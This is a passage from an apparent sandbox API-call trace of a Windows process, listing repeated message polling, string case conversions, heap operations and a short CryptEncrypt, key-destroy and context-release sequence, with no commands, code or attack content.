dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.352] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x14d34, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x14d38) returned 1 [0195.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.352] CharLowerBuffW (in: lpsz="byte[85304]", cchLength=0xb | out: lpsz="byte[85304]") returned 0xb [0195.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.353] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.353] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.353] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.353] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.353] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.353] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.353] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34dbcd0*, pdwDataLen=0x8bef68*=0x14d34, dwBufLen=0x14d38 | out: pbData=0x34dbcd0*, pdwDataLen=0x8bef68*=0x14d38) returned 1 [0195.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.355] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0195.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.355] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0195.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.355] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0195.355] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.355] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0195.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.356] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.356] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.356] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.356] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.356] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.356] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.356] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.356] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.356] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.410] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.410] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.410] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.413] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0195.413] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.413] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0195.413] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.413] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.413] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.414] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0195.414] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.414] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0195.414] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0195.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.414] CryptDestroyKey (hKey=0xaa5820) returned 1 [0195.414] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.414] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.414] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0195.414] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.414] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0195.414] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.414] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.414] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0195.414] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.414] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0195.415] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.415] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.415] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.415] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.455] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.455] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0195.455] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.455] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0195.455] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0195.455] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.455] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.455] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.455] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.455] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.455] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0195.455] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.455] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0195.455] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.455] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.455] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0195.456] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.456] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0195.456] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.456] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.456] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.456] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.456] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.456] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.456] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.456] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.456] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.456] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.456] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.456] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.456] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.456] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.456] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.456] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0195.456] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.456] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0195.457] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.457] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.457] CryptReleaseContext (hProv=0xad6150, dwFlags=0x0) returned 1 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0195.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0195.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0195.459] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0195.459] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0195.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.459] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0195.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0195.460] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0195.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.460] HeapFree 